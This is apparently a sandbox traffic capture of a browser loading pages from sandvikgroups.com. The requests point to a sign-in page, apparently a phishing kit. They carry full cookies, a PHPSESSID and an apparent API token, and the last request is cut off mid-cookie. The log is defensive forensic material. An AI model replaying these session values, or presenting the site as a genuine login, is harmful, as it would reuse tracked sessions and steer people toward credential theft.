    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: sandvikgroups.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA
    Source: global trafficHTTP traffic detected: GET /?cono HTTP/1.1Host: sandvikgroups.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://sandvikgroups.com/?conoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/849bfe45bf45/main.js? HTTP/1.1Host: sandvikgroups.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/849bfe45bf45/main.js? HTTP/1.1Host: sandvikgroups.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc
    Source: global trafficHTTP traffic detected: GET /?auth&apitoken=qrd0fg2hx9ez7rr HTTP/1.1Host: sandvikgroups.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://sandvikgroups.com/?conoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
    Source: global trafficHTTP traffic detected: GET /?get_link=ch_files/ca/csspage2.php?page=signin&t=qrd0fg2hx9ez7rr HTTP/1.1Host: sandvikgroups.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://sandvikgroups.com/?auth&apitoken=qrd0fg2hx9ez7rrAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
    Source: global trafficHTTP traffic detected: GET /ajax/libs/modernizr/2.8.3/modernizr.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://sandvikgroups.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?get_link=ch_files/lib/js/jquery-3.3.1.min.js HTTP/1.1Host: sandvikgroups.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sandvikgroups.com/?auth&apitoken=qrd0fg2hx9ez7rrAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
    Source: global trafficHTTP traffic detected: GET /ajax/libs/modernizr/2.8.3/modernizr.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?get_link=ch_files/lib/js/jquery-3.3.1.min.js HTTP/1.1Host: sandvikgroups.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
    Source: global trafficHTTP traffic detected: GET /?get_link=ch_files/fonts/lighter_font.woff HTTP/1.1Host: sandvikgroups.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://sandvikgroups.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://sandvikgroups.com/?get_link=ch_files/ca/csspage2.php?page=signin&t=qrd0fg2hx9ez7rrAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
    Source: global trafficHTTP traffic detected: GET /?get_link=ch_files/pics/white_logo.svg HTTP/1.1Host: sandvikgroups.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sandvikgroups.com/?get_link=ch_files/ca/csspage2.php?page=signin&t=qrd0fg2hx9ez7rrAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
    Source: global trafficHTTP traffic detected: GET /?get_link=ch_files/pics/1024_bg.jpg HTTP/1.1Host: sandvikgroups.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sandvikgroups.com/?get_link=ch_files/ca/csspage2.php?page=signin&t=qrd0fg2hx9ez7rrAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/jsd/r/8fe6e9464fad422f HTTP/1.1Host: sandvikgroups.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
    Source: global trafficHTTP traffic detected: GET /?get_link=ch_files/pics/white_logo.svg HTTP/1.1Host: sandvikgroups.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; 